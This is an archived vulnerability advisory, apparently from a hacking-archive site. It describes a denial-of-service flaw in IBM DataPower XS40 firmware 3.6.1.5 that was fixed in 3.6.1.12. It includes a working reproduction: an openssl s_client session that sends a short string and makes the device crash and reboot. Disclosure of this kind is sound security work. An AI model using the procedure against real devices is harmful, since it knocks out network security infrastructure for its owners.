AOH :: HP Unsorted D :: VA2238.HTM

Denial of Service



Denial of Service
Denial of Service



It appears it is possible to crash the IBM DataPower XS40 Security Gateway device by sending a simple (random?) string to it, over an established SSL-connection. The device reboots as a response to the input.

Tested vulnerable firmware is 3.6.1.5
Issue fixed as tested in 3.6.1.12

Tested as follows (entered attack-string is =B4abc=B4 in this case):
openssl s_client -connect [IP]:[port]
Loading 'screen' into random state - done
CONNECTED(0000078C)
..
---
abc [enter][enter]

read:errno=0

After this, the device crashes and reboots


The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.